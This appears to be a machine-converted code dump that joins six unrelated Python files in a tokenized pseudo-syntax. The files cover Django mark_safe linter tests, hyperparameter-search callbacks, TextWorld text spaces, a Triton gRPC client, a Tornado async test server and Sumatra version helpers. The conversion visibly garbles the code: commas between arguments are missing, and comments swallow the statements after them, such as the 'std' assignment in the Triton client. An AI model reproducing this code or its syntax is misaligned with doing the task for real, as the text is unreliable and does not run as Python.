<import_stmt>os<import_from_stmt>django.utils safestring<line_sep>safestring.mark_safe('<b>secure</b>')<line_sep>safestring.SafeText('<b>secure</b>')<line_sep>safestring.SafeUnicode('<b>secure</b>')<line_sep>safestring.SafeString('<b>secure</b>')<line_sep>safestring.SafeBytes('<b>secure</b>')<line_sep>my_secure_str='<b>Hello World</b>'<line_sep>safestring.mark_safe(my_secure_str)<line_sep>my_secure_str,_=('<b>Hello World</b>' '')<line_sep>safestring.mark_safe(my_secure_str)<line_sep>also_secure_str=my_secure_str<line_sep>safestring.mark_safe(also_secure_str)<def_stmt>try_secure <block_start><try_stmt><block_start>my_secure_str='Secure'<block_end><except_stmt>Exception<block_start>my_secure_str='Secure'<block_end><else_stmt><block_start>my_secure_str='Secure'<block_end><finally_stmt><block_start>my_secure_str='Secure'<block_end>safestring.mark_safe(my_secure_str)<block_end><def_stmt>format_secure <block_start>safestring.mark_safe('<b>{}</b>'.format('secure'))<line_sep>my_secure_str='secure'<line_sep>safestring.mark_safe('<b>{}</b>'.format(my_secure_str))<line_sep>safestring.mark_safe('<b>{} {}</b>'.format(my_secure_str 'a'))<line_sep>safestring.mark_safe('<b>{} {}</b>'.format(*[my_secure_str 'a']))<line_sep>safestring.mark_safe('<b>{b}</b>'.format(b=my_secure_str))# nosec TODO safestring.mark_safe('<b>{b}</b>'.format(**{'b':my_secure_str}))# nosec TODO my_secure_str='<b>{}</b>'.format(my_secure_str)<line_sep>safestring.mark_safe(my_secure_str)<block_end><def_stmt>percent_secure <block_start>safestring.mark_safe('<b>%s</b>'%'secure')<line_sep>my_secure_str='secure'<line_sep>safestring.mark_safe('<b>%s</b>'%my_secure_str)<line_sep>safestring.mark_safe('<b>%s %s</b>'%(my_secure_str 'a'))<line_sep>safestring.mark_safe('<b>%(b)s</b>'%{'b':my_secure_str})<block_end># nosec TODO <def_stmt>with_secure path<block_start><with_stmt>open(path)<as>f<block_start>safestring.mark_safe('Secure')<block_end><block_end><def_stmt>loop_secure <block_start>my_secure_str=''<for_stmt>i range(ord(os.urandom(1)))<block_start>my_secure_str<augadd>' Secure'<block_end>safestring.mark_safe(my_secure_str)<while_stmt>ord(os.urandom(1))%2<eq>0<block_start>my_secure_str<augadd>' Secure'<block_end>safestring.mark_safe(my_secure_str)<block_end><def_stmt>all_secure_case <block_start><if_stmt>ord(os.urandom(1))%2<eq>0<block_start>my_secure_str='Secure'<block_end><elif_stmt>ord(os.urandom(1))%2<eq>0<block_start>my_secure_str='Secure'<block_end><else_stmt><block_start>my_secure_str='Secure'<block_end>safestring.mark_safe(my_secure_str)<block_end>
# -*- coding:utf-8 -*- """ """<import_stmt>datetime<import_stmt>json<import_stmt>os<import_stmt>time<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<import_from_stmt>IPython.display display update_display display_markdown<import_from_stmt>tqdm.auto tqdm<import_from_stmt>..utils logging fs to_repr<line_sep>logger=logging.get_logger(__name__)<class_stmt>Callback()<block_start><def_stmt>__init__ self<block_start><pass><block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start><pass><block_end><def_stmt>on_search_end self hyper_model<block_start><pass><block_end><def_stmt>on_search_error self hyper_model<block_start><pass><block_end><def_stmt>on_build_estimator self hyper_model space estimator trial_no<block_start><pass><block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start><pass><block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start><pass><block_end><def_stmt>on_trial_error self hyper_model space trial_no<block_start><pass><block_end><def_stmt>on_skip_trial self hyper_model space trial_no reason reward improved elapsed<block_start><pass><block_end><def_stmt>__repr__ self<block_start><return>to_repr(self)<block_end><block_end><class_stmt>EarlyStoppingError(RuntimeError)<block_start><def_stmt>__init__ self *arg<block_start>self.args=arg<block_end><block_end><class_stmt>EarlyStoppingCallback(Callback)<block_start>REASON_TRIAL_LIMIT='max_no_improvement_trials'<line_sep>REASON_TIME_LIMIT='time_limit'<line_sep>REASON_EXPECTED_REWARD='expected_reward'<def_stmt>__init__ self max_no_improvement_trials=0 mode='min' min_delta=0 time_limit=<none> expected_reward=<none><block_start>super(Callback self).__init__()<line_sep># assert time_limit is None or time_limit > 60, 'If `time_limit` is not None, it must be greater than 60.' 
# settings <if_stmt>mode<eq>'min'<block_start>self.op=np.less<block_end><elif_stmt>mode<eq>'max'<block_start>self.op=np.greater<block_end><else_stmt><block_start><raise>ValueError(f'Unsupported mode:{mode}')<block_end>self.max_no_improvement_trials=max_no_improvement_trials<line_sep>self.mode=mode<line_sep>self.min_delta=min_delta<line_sep>self.time_limit=time_limit<line_sep>self.expected_reward=expected_reward<line_sep># running state self.start_time=<none><line_sep>self.best_reward=<none><line_sep>self.best_trial_no=<none><line_sep>self.counter_no_improvement_trials=0<line_sep>self.triggered=<none><line_sep>self.triggered_reason=<none><block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start>self.triggered=<false><line_sep>self.triggered_reason=<none><block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start><if_stmt>self.start_time<is><none><block_start>self.start_time=time.time()<block_end><block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start><if_stmt>self.start_time<is><none><block_start>self.start_time=time.time()<block_end>time_total=time.time()-self.start_time<if_stmt>self.time_limit<is><not><none><and>self.time_limit<g>0<block_start><if_stmt>time_total<g>self.time_limit<block_start>self.triggered=<true><line_sep>self.triggered_reason=self.REASON_TIME_LIMIT<block_end><block_end><if_stmt>self.expected_reward<is><not><none><and>self.expected_reward<ne>0.0<block_start><if_stmt>self.op(reward self.expected_reward)<block_start>self.triggered=<true><line_sep>self.triggered_reason=self.REASON_EXPECTED_REWARD<block_end><block_end><if_stmt>self.max_no_improvement_trials<is><not><none><and>self.max_no_improvement_trials<g>0<block_start><if_stmt>self.best_reward<is><none><block_start>self.best_reward=reward<line_sep>self.best_trial_no=trial_no<block_end><else_stmt><block_start><if_stmt>self.op(reward self.best_reward-self.min_delta)<block_start>self.best_reward=reward<line_sep>self.best_trial_no=trial_no<line_sep>self.counter_no_improvement_trials=0<block_end><else_stmt><block_start>self.counter_no_improvement_trials<augadd>1<if_stmt>self.counter_no_improvement_trials<ge>self.max_no_improvement_trials<block_start>self.triggered=<true><line_sep>self.triggered_reason=self.REASON_TRIAL_LIMIT<block_end><block_end><block_end><block_end><if_stmt>self.triggered<block_start>msg=f'Early stopping on trial : {trial_no}, reason: {self.triggered_reason}, '<concat>f'best reward: {self.best_reward}, best trial: {self.best_trial_no}, '<concat>f'elapsed seconds: {time_total}'<if_stmt>logger.is_info_enabled()<block_start>logger.info(msg)<block_end><raise>EarlyStoppingError(msg)<block_end><block_end><block_end><class_stmt>FileLoggingCallback(Callback)<block_start><def_stmt>__init__ self searcher output_dir=<none><block_start>super(FileLoggingCallback self).__init__()<line_sep>self.output_dir=self._prepare_output_dir(output_dir searcher)<block_end>@staticmethod<def_stmt>open file_path mode<block_start><return>open(file_path mode=mode)<block_end>@staticmethod<def_stmt>mkdirs dir_path exist_ok<block_start>os.makedirs(dir_path exist_ok=exist_ok)<block_end><def_stmt>_prepare_output_dir self log_dir 
searcher<block_start><if_stmt>log_dir<is><none><block_start>log_dir='log'<block_end><if_stmt>log_dir[-1]<eq>'/'<block_start>log_dir=log_dir[:-1]<block_end>running_dir=f'exp_{searcher.__class__.__name__}_{datetime.datetime.now().__format__("%m%d-%H%M%S")}'<line_sep>output_path=os.path.expanduser(f'{log_dir}/{running_dir}')<line_sep>self.mkdirs(output_path exist_ok=<true>)<line_sep><return>output_path<block_end><def_stmt>on_build_estimator self hyper_model space estimator trial_no<block_start><pass><block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start><pass><line_sep># with open(f'{self.output_dir}/trial_{trial_no}.log', 'w') as f: # f.write(space.params_summary()) <block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start><with_stmt>self.open(f'{self.output_dir}/trial_{improved}_{trial_no:04d}_{reward:010.8f}_{elapsed:06.2f}.log' 'w')<as>f<block_start>f.write(space.params_summary())<line_sep>f.write('\r\n----------------Summary for Searcher----------------\r\n')<line_sep>f.write(hyper_model.searcher.summary())<block_end>topn=10<line_sep>diff=hyper_model.history.diff(hyper_model.history.get_top(topn))<with_stmt>self.open(f'{self.output_dir}/top_{topn}_diff.txt' 'w')<as>f<block_start>diff_str=json.dumps(diff indent=5)<line_sep>f.write(diff_str)<line_sep>f.write('\r\n')<line_sep>f.write(hyper_model.searcher.summary())<block_end><with_stmt>self.open(f'{self.output_dir}/top_{topn}_config.txt' 'w')<as>f<block_start>trials=hyper_model.history.get_top(topn)<line_sep>configs=hyper_model.export_configuration(trials)<for_stmt>trial,conf zip(trials configs)<block_start>f.write(f'Trial No: {trial.trial_no}, Reward: {trial.reward}\r\n')<line_sep>f.write(conf)<line_sep>f.write('\r\n---------------------------------------------------\r\n\r\n')<block_end><block_end><block_end><def_stmt>on_skip_trial self hyper_model space trial_no reason reward improved elapsed<block_start><with_stmt>self.open(f'{self.output_dir}/trial_{reason}_{improved}_{trial_no:04d}_{reward:010.8f}_{elapsed:06.2f}.log' 'w')<as>f<block_start>f.write(space.params_summary())<block_end>topn=5<line_sep>diff=hyper_model.history.diff(hyper_model.history.get_top(topn))<with_stmt>self.open(f'{self.output_dir}/top_{topn}_diff.txt' 'w')<as>f<block_start>diff_str=json.dumps(diff indent=5)<line_sep>f.write(diff_str)<block_end><block_end><block_end><class_stmt>FileStorageLoggingCallback(FileLoggingCallback)<block_start>@staticmethod<def_stmt>open file_path mode<block_start><return>fs.open(file_path mode=mode)<block_end>@staticmethod<def_stmt>mkdirs dir_path exist_ok<block_start>fs.mkdirs(dir_path exist_ok=exist_ok)<block_end><block_end><class_stmt>SummaryCallback(Callback)<block_start><def_stmt>__init__ self<block_start>super(SummaryCallback self).__init__()<line_sep>self.start_search_time=<none><block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start>self.start_search_time=time.time()<block_end><def_stmt>on_build_estimator self hyper_model space estimator trial_no# if logger.is_info_enabled(): # logger.info(f'\nTrial No:{trial_no}') # logger.info(space.params_summary()) <block_start>estimator.summary()<block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start><if_stmt>logger.is_info_enabled()<block_start>msg=f'\nTrial No:{trial_no}{space.params_summary()}\ntrial {trial_no} begin'<line_sep>logger.info(msg)<block_end><block_end><def_stmt>on_trial_end self hyper_model space 
trial_no reward improved elapsed<block_start><if_stmt>logger.is_info_enabled()<block_start>logger.info(f'trial end. reward:{reward}, improved:{improved}, elapsed:{elapsed}')<line_sep>logger.info(f'Total elapsed:{time.time()-self.start_search_time}')<block_end><block_end><def_stmt>on_skip_trial self hyper_model space trial_no reason reward improved elapsed<block_start><if_stmt>logger.is_info_enabled()<block_start>logger.info(f'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')<line_sep>logger.info(f'trial skip. reason:{reason}, reward:{reward}, improved:{improved}, elapsed:{elapsed}')<line_sep>logger.info(f'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')<block_end><block_end><block_end><class_stmt>NotebookCallback(Callback)<block_start><def_stmt>__init__ self<block_start>super(NotebookCallback self).__init__()<line_sep>self.current_trial_display_id=<none><line_sep>self.search_summary_display_id=<none><line_sep>self.best_trial_display_id=<none><line_sep>self.title_display_id=<none><line_sep>self.last_trial_no=0<line_sep>self.last_reward=0<line_sep>self.start_time=0<line_sep>self.max_trials=0<block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start>self.start_time=time.time()<line_sep>self.max_trials=max_trials<line_sep>df_holder=pd.DataFrame()<line_sep>settings={'X':X.shape 'y':y.shape 'X_eval':X_eval.shape<if>X_eval<is><not><none><else><none> 'y_eval':y_eval.shape<if>y_eval<is><not><none><else><none> 'cv':cv 'num_folds':num_folds 'max_trials':max_trials # 'dataset_id': dataset_id, # 'trail_store': trial_store, 'fit_kwargs':fit_kwargs.keys()}<line_sep>df_settings=pd.DataFrame({k:[v]<for>k,v settings.items()})<line_sep>display_markdown('#### Experiment Settings:' raw=<true>)<line_sep>display(hyper_model display_id=<false>)<line_sep>display(df_settings display_id=<false>)<line_sep>display_markdown('#### Trials Summary:' raw=<true>)<line_sep>handle=display(df_holder display_id=<true>)<if_stmt>handle<is><not><none><block_start>self.search_summary_display_id=handle.display_id<block_end>display_markdown('#### Best Trial:' raw=<true>)<line_sep>handle=display(df_holder display_id=<true>)<if_stmt>handle<is><not><none><block_start>self.best_trial_display_id=handle.display_id<block_end>handle=display({'text/markdown':'#### Current Trial:'} raw=<true> include=['text/markdown'] display_id=<true>)<if_stmt>handle<is><not><none><block_start>self.title_display_id=handle.display_id<block_end>handle=display(df_holder display_id=<true>)<if_stmt>handle<is><not><none><block_start>self.current_trial_display_id=handle.display_id<block_end><block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start>df_summary=pd.DataFrame([(trial_no self.last_reward hyper_model.best_trial_no hyper_model.best_reward time.time()-self.start_time len([t<for>t hyper_model.history.trials<if>t.succeeded]) self.max_trials)] columns=['Trial No.' 
'Previous reward' 'Best trial' 'Best reward' 'Total elapsed' 'Valid trials' 'Max trials'])<if_stmt>self.search_summary_display_id<is><not><none><block_start>update_display(df_summary display_id=self.search_summary_display_id)<block_end><if_stmt>self.current_trial_display_id<is><not><none><block_start>update_display(space display_id=self.current_trial_display_id)<block_end><block_end><def_stmt>on_search_end self hyper_model<block_start>df_summary=pd.DataFrame([(self.last_trial_no self.last_reward hyper_model.best_trial_no hyper_model.best_reward time.time()-self.start_time len([t<for>t hyper_model.history.trials<if>t.succeeded]) self.max_trials)] columns=['Trial No.' 'Previous reward' 'Best trial' 'Best reward' 'Total elapsed' 'Valid trials' 'Max trials'])<if_stmt>self.search_summary_display_id<is><not><none><block_start>update_display(df_summary display_id=self.search_summary_display_id)<block_end><if_stmt>self.title_display_id<is><not><none><block_start>update_display({'text/markdown':'#### Top trials:'} raw=<true> include=['text/markdown'] display_id=self.title_display_id)<block_end>df_best_trials=pd.DataFrame([(t.trial_no t.reward t.elapsed t.space_sample.vectors)<for>t hyper_model.get_top_trials(5)] columns=['Trial No.' 'Reward' 'Elapsed' 'Space Vector'])<if_stmt>self.current_trial_display_id<is><not><none><block_start>update_display(df_best_trials display_id=self.current_trial_display_id)<block_end><block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start>self.last_trial_no=trial_no<line_sep>self.last_reward=reward<line_sep>best_trial=hyper_model.get_best_trial()<if_stmt>best_trial<is><not><none><and>self.best_trial_display_id<is><not><none><block_start>update_display(best_trial.space_sample display_id=self.best_trial_display_id)<block_end><block_end><def_stmt>on_trial_error self hyper_model space trial_no<block_start>self.last_trial_no=trial_no<line_sep>self.last_reward='ERR'<block_end><block_end><class_stmt>ProgressiveCallback(Callback)<block_start><def_stmt>__init__ self<block_start>super(ProgressiveCallback self).__init__()<line_sep>self.pbar=<none><block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start>self.pbar=tqdm(total=max_trials leave=<false> desc='search')<block_end><def_stmt>on_search_end self hyper_model<block_start>self.pbar.update(self.pbar.total)<line_sep>self.pbar.close()<line_sep>self.pbar=<none><block_end><def_stmt>on_search_error self hyper_model<block_start>self.on_search_end(hyper_model)<block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start>self.pbar.update(1)<block_end><def_stmt>on_trial_error self hyper_model space trial_no<block_start>self.pbar.update(1)<block_end><block_end>
<import_stmt>re<import_stmt>string<import_stmt>numpy<as>np<import_stmt>gym<import_stmt>gym.spaces<class_stmt>VocabularyHasDuplicateTokens(ValueError)<block_start><pass><block_end><class_stmt>Char(gym.spaces.MultiDiscrete)<block_start>""" Character observation/action space This space consists of a series of `gym.spaces.Discrete` objects all with the same parameters. Each `gym.spaces.Discrete` can take integer values between 0 and len(self.vocab). Notes ----- The following special token will be prepended (if needed) to the vocabulary: * '#' : Padding token """<def_stmt>__init__ self max_length vocab=<none> extra_vocab=[]<block_start>""" Parameters ---------- max_length : int Maximum number of characters in a text. vocab : list of char, optional Vocabulary defining this space. It shouldn't contain any duplicate characters. If not provided, the vocabulary will consists in characters [a-z0-9], punctuations [" ", "-", "'"] and padding '#'. extra_vocab : list of char, optional Additional tokens to add to the vocabulary. """<if_stmt>vocab<is><none><block_start>vocab=list(string.ascii_lowercase+string.digits)<line_sep>vocab<augadd>[" " "-" "'"]<block_end>vocab<augadd>extra_vocab<if_stmt>len(vocab)<ne>len(set(vocab))<block_start><raise>VocabularyHasDuplicateTokens()<block_end>self.max_length=max_length<line_sep>self.PAD="#"<line_sep>special_tokens=[self.PAD]<line_sep>self.vocab=[t<for>t special_tokens<if>t<not><in>vocab]<line_sep>self.vocab<augadd>list(vocab)<line_sep>self.vocab_set=set(self.vocab)# For faster lookup. self.vocab_size=len(self.vocab)<line_sep>self.id2c={i:c<for>i,c enumerate(self.vocab)}<line_sep>self.c2id={c:i<for>i,c self.id2c.items()}<line_sep>self.PAD_id=self.c2id[self.PAD]<line_sep>super().__init__([len(self.vocab)-1]<times>self.max_length)<line_sep>self.dtype=np.int64<block_end># Overwrite Gym's dtype=int8. <def_stmt>filter_unknown self text<block_start>""" Strip out all characters not in the vocabulary. """<line_sep><return>"".join(c<for>c text<if>c<in>self.vocab_set)<block_end><def_stmt>tokenize self text padding=<false><block_start>""" Tokenize characters found in the vocabulary. Note: text will be padded up to `self.max_length`. """<line_sep>text=self.filter_unknown(text.lower())<line_sep>ids=[self.c2id[c]<for>c text]<line_sep># Add padding. <if_stmt>padding<block_start>nb_pads=self.max_length-len(ids)<line_sep>msg="Provided `max_length` was not large enough ({} chars).".format(len(ids))<assert_stmt>nb_pads<ge>0 msg<line_sep>ids<augadd>[self.PAD_id]<times>nb_pads<block_end><return>np.array(ids)<block_end><def_stmt>__repr__ self<block_start><return>"Character({})".format(self.max_length)<block_end><block_end><class_stmt>Word(gym.spaces.MultiDiscrete)<block_start>""" Word observation/action space This space consists of a series of `gym.spaces.Discrete` objects all with the same parameters. Each `gym.spaces.Discrete` can take integer values between 0 and `len(self.vocab)`. Notes ----- The following special tokens will be prepended (if needed) to the vocabulary: * '<PAD>' : Padding * '<UNK>' : Unknown word * '<S>' : Beginning of sentence * '</S>' : End of sentence Example ------- Let's create an action space that can be used with :py:meth:`textworld.gym.register_game <textworld.gym.utils.register_game>`. We are going to assume actions are short phrases up to 8 words long. >>> import textworld >>> gamefiles = ["/path/to/game.ulx", "/path/to/another/game.z8"] >>> vocab = textworld.vocab.extract_from(gamefiles) >>> vocab = sorted(vocab) # Sorting the vocabulary, optional. 
>>> action_space = textworld.gym.text_spaces.Word(max_length=8, vocab=vocab) """<def_stmt>__init__ self max_length vocab<block_start>""" Parameters ---------- max_length : int Maximum number of words in a text. vocab : list of strings Vocabulary defining this space. It shouldn't contain any duplicate words. """<if_stmt>len(vocab)<ne>len(set(vocab))<block_start><raise>VocabularyHasDuplicateTokens()<block_end>self.max_length=max_length<line_sep>self.PAD="<PAD>"<line_sep>self.UNK="<UNK>"<line_sep>self.BOS="<S>"<line_sep>self.EOS="</S>"<line_sep>self.SEP="<|>"<line_sep>special_tokens=[self.PAD self.UNK self.EOS self.BOS self.SEP]<line_sep>self.vocab=[w<for>w special_tokens<if>w<not><in>vocab]<line_sep>self.vocab<augadd>list(vocab)<line_sep>self.vocab_set=set(self.vocab)# For faster lookup. self.vocab_size=len(self.vocab)<line_sep>self.id2w={i:w<for>i,w enumerate(self.vocab)}<line_sep>self.w2id={w:i<for>i,w self.id2w.items()}<line_sep>self.PAD_id=self.w2id[self.PAD]<line_sep>self.UNK_id=self.w2id[self.UNK]<line_sep>self.BOS_id=self.w2id[self.BOS]<line_sep>self.EOS_id=self.w2id[self.EOS]<line_sep>self.SEP_id=self.w2id[self.SEP]<line_sep>super().__init__([len(self.vocab)-1]<times>self.max_length)<line_sep>self.dtype=np.int64<block_end># Overwrite Gym's dtype=int8. <def_stmt>tokenize self text padding=<false><block_start>""" Tokenize words found in the vocabulary. Note: text will be padded up to `self.max_length`. """<line_sep>text=text.lower()# Work only with lowercase letters. # Find beginning and end of sentences. text=text.replace("." " </S> <S> ")<line_sep>text="<S> "+text+" </S>"<line_sep># Strip out all non-alphabetic characters. text=text.replace("'" "")<line_sep>text=re.sub("[^a-z0-9 <S>/]" " " text)<line_sep># TODO: convert numbers to text? # Get words ids and replace unknown words with <UNK>. words=text.split()<line_sep>ids=[self.w2id.get(w self.UNK_id)<for>w words]<line_sep># Add padding. <if_stmt>padding<block_start>nb_pads=self.max_length-len(ids)<line_sep>msg="Provided `max_length` was not large enough ({} words).".format(len(ids))<assert_stmt>nb_pads<ge>0 msg<line_sep>ids<augadd>[self.PAD_id]<times>nb_pads<block_end><return>np.array(ids)<block_end><def_stmt>__repr__ self<block_start><return>"Word(L={}, V={})".format(self.max_length self.vocab_size)<block_end><block_end>
<import_stmt>numpy<as>np<import_stmt>cv2<import_stmt>grpc<import_from_stmt>tritonclient.grpc service_pb2 service_pb2_grpc<import_stmt>tritonclient.grpc.model_config_pb2<as>mc<line_sep>np.random.seed(123)<line_sep>palette=np.random.randint(0 256 (100 3))<line_sep># url = '10.128.61.7:8001' url='127.0.0.1:8001'<line_sep>model_name='bisenetv2'<line_sep>model_version='1'<line_sep>inp_name='input_image'<line_sep>outp_name='preds'<line_sep>inp_dtype='FP32'<line_sep>outp_dtype=np.int64<line_sep>inp_shape=[1 3 1024 2048]<line_sep>outp_shape=[1024 2048]<line_sep>impth='../example.png'<line_sep>mean=[0.3257 0.3690 0.3223]# city, rgb std=[0.2112 0.2148 0.2115]<line_sep>option=[('grpc.max_receive_message_length' 1073741824) ('grpc.max_send_message_length' 1073741824) ]<line_sep>channel=grpc.insecure_channel(url options=option)<line_sep>grpc_stub=service_pb2_grpc.GRPCInferenceServiceStub(channel)<line_sep>metadata_request=service_pb2.ModelMetadataRequest(name=model_name version=model_version)<line_sep>metadata_response=grpc_stub.ModelMetadata(metadata_request)<line_sep>print(metadata_response)<line_sep>config_request=service_pb2.ModelConfigRequest(name=model_name version=model_version)<line_sep>config_response=grpc_stub.ModelConfig(config_request)<line_sep>print(config_response)<line_sep>request=service_pb2.ModelInferRequest()<line_sep>request.model_name=model_name<line_sep>request.model_version=model_version<line_sep>inp=service_pb2.ModelInferRequest().InferInputTensor()<line_sep>inp.name=inp_name<line_sep>inp.datatype=inp_dtype<line_sep>inp.shape.extend(inp_shape)<line_sep>mean=np.array(mean).reshape(1 1 3)<line_sep>std=np.array(std).reshape(1 1 3)<line_sep>im=cv2.imread(impth)[: : ::-1]<line_sep>im=cv2.resize(im dsize=tuple(inp_shape[-1:-3:-1]))<line_sep>im=((im/255.)-mean)/std<line_sep>im=im[<none> <ellipsis>].transpose(0 3 1 2)<line_sep>inp_bytes=im.astype(np.float32).tobytes()<line_sep>request.ClearField("inputs")<line_sep>request.ClearField("raw_input_contents")<line_sep>request.inputs.extend([inp ])<line_sep>request.raw_input_contents.extend([inp_bytes ])<line_sep>outp=service_pb2.ModelInferRequest().InferRequestedOutputTensor()<line_sep>outp.name=outp_name<line_sep>request.outputs.extend([outp ])<line_sep># sync # resp = grpc_stub.ModelInfer(request).raw_output_contents[0] # async resp=grpc_stub.ModelInfer.future(request)<line_sep>resp=resp.result().raw_output_contents[0]<line_sep>out=np.frombuffer(resp dtype=outp_dtype).reshape(*outp_shape)<line_sep>out=palette[out]<line_sep>cv2.imwrite('res.png' out)<line_sep>
# coding: utf-8 <import_from_stmt>AsyncIteratorWrapper AsyncIteratorWrapper<import_stmt>asyncio<import_stmt>functools<import_stmt>aiohttp<import_stmt>tornado.web<import_from_stmt>tornado.platform.asyncio AsyncIOMainLoop<import_from_stmt>threading Thread<line_sep>headers={"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" "Accept-Encoding":"gzip, deflate, sdch" "Accept-Language":"zh-CN,zh;q=0.8" "Upgrade-Insecure-Requests":"1" "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" }<line_sep>session=aiohttp.ClientSession(headers=headers)<line_sep>f=open('./tmp.txt' 'a' encoding='utf-8')<def_stmt>printer future<block_start>print(future.result()[0])<line_sep>f.write(future.result()[1])<line_sep>print('done')<block_end><async_keyword><def_stmt>producer <block_start>future=asyncio.run_coroutine_threadsafe(coro() worker_loop)<line_sep>future.add_done_callback(functools.partial(printer))<line_sep><await>asyncio.sleep(0)<block_end><async_keyword><def_stmt>coro <block_start><async_keyword><with_stmt>session.get("https://www.internationalsaimoe.com" ssl=<false>)<as>res<block_start>text=<await>res.text()<line_sep><return>[res.status text]<block_end><block_end><class_stmt>MainHandler(tornado.web.RequestHandler)<block_start><async_keyword><def_stmt>get self<block_start><async_keyword><for_stmt>i AsyncIteratorWrapper(range(1))<block_start>future=asyncio.run_coroutine_threadsafe(coro() worker_loop)<line_sep>future.add_done_callback(functools.partial(printer))<line_sep>#await producer() #await asyncio.run_coroutine_threadsafe(coro(), loop) <block_end>#text = await asyncio.get_event_loop().create_task(coro()) #self.write(text) self.finish('It works!')<block_end><def_stmt>post self<block_start>print(self.request.body)<line_sep>#data=self.get_argument('data') #print(data) self.write('POST received')<line_sep>print('POST received')<block_end><block_end><def_stmt>start_loop loop# run the event loop; the loop is passed in as an argument <block_start>loop.run_forever()<block_end><if_stmt>__name__<eq>"__main__"<block_start>AsyncIOMainLoop().install()<line_sep>app=tornado.web.Application([(r"/" MainHandler)])<line_sep>app.listen(8888)<line_sep>print('TornadoTestAsync2@localhost:8888')<line_sep>producer_loop=asyncio.get_event_loop()<line_sep>tornadoThread=Thread(target=start_loop args=(producer_loop ))# producer thread tornadoThread.start()# start the producer tornado thread worker_loop=asyncio.get_event_loop()<block_end>
""" Functions for finding the version of a dependency. Classes ------- BaseDependency - base class for holding information about a program component. Functions --------- find_version_from_versioncontrol - determines whether a file is under version control, and if so, obtains version information from this. find_version() - tries to find version information by calling a series of functions in turn. :copyright: Copyright 2006-2015 by the Sumatra team, see doc/authors.txt :license: BSD 2-clause, see LICENSE for details. """<import_from_future_stmt> unicode_literals<import_from_stmt>builtins object<import_stmt>os<import_from_stmt>sumatra versioncontrol<def_stmt>find_versions_from_versioncontrol dependencies<block_start>"""Determine whether a file is under version control, and if so, obtain version information from this."""<for_stmt>dependency dependencies<block_start><if_stmt>dependency.version<eq>"unknown"<block_start><try_stmt><block_start>wc=versioncontrol.get_working_copy(dependency.path)<block_end><except_stmt>versioncontrol.VersionControlError<block_start><pass># dependency.version remains "unknown" <block_end><else_stmt><block_start><if_stmt>wc.has_changed()<block_start>dependency.diff=wc.diff()<block_end>dependency.version=wc.current_version()<line_sep>dependency.source=wc.repository.url<block_end><block_end><block_end><return>dependencies<block_end># add support for using packaging systems, e.g. apt, to find versions. # add support for looking for Subversion $Id:$ tags, etc. <def_stmt>find_versions dependencies heuristics<block_start>""" Try to find version information by calling a series of functions in turn. *dependencies*: a list of Dependency objects. *heuristics*: a list of functions that accept a component as the single argument and return a version number or 'unknown'. Returns a possibly modified list of dependencies """<for_stmt>heuristic heuristics<block_start>dependencies=heuristic(dependencies)<block_end><return>dependencies<block_end><def_stmt>find_file path current_directory search_dirs<block_start>""" Look for path as an absolute path then relative to the current directory, then relative to *search_dirs*. Return the absolute path. """<line_sep>op=os.path<if_stmt>op.exists(path)<block_start><return>op.abspath(path)<block_end><for_stmt>dir [current_directory]+search_dirs<block_start>search_path=op.join(dir path)<if_stmt>op.exists(search_path)<block_start><return>search_path<block_end><block_end><raise>IOError("File %s does not exist"%path)<block_end><class_stmt>BaseDependency(object)<block_start>""" Contains information about a program component, and tries to determine version information. *name*: an identifying name, e.g. the module name in Python *path*: the location of the dependency file in the local filesystem *version*: the version of the dependency, if that can be determined, otherwise 'unknown'. Always a string, even if the version can also be represented as a number. *diff*: if the dependency is under version control and has been modified, the diff between the actual version and the last-committed version. *source*: an identifier for where the dependency came from, if known, e.g. the url of a version control repository or the name of a Linux package. """<def_stmt>__init__ self name path=<none> version='unknown' diff='' source=<none><block_start>self.name=name<line_sep>self.path=path<line_sep>self.diff=diff<line_sep>self.version=version<line_sep>self.source=source<block_end># e.g. url of (upstream?) 
repository <def_stmt>__repr__ self<block_start><return>"%s (%s) version=%s%s"%(self.name self.path self.version self.diff<and>"*"<or>'')<block_end><def_stmt>__eq__ self other<block_start><return>self.name<eq>other.name<and>self.path<eq>other.path<and>self.version<eq>other.version<and>self.diff<eq>other.diff<block_end><def_stmt>__ne__ self other<block_start><return><not>self.__eq__(other)<block_end><def_stmt>__hash__ self<block_start><return>hash(self.name)^hash(self.path)^hash(self.version)^hash(self.diff)<block_end><block_end>
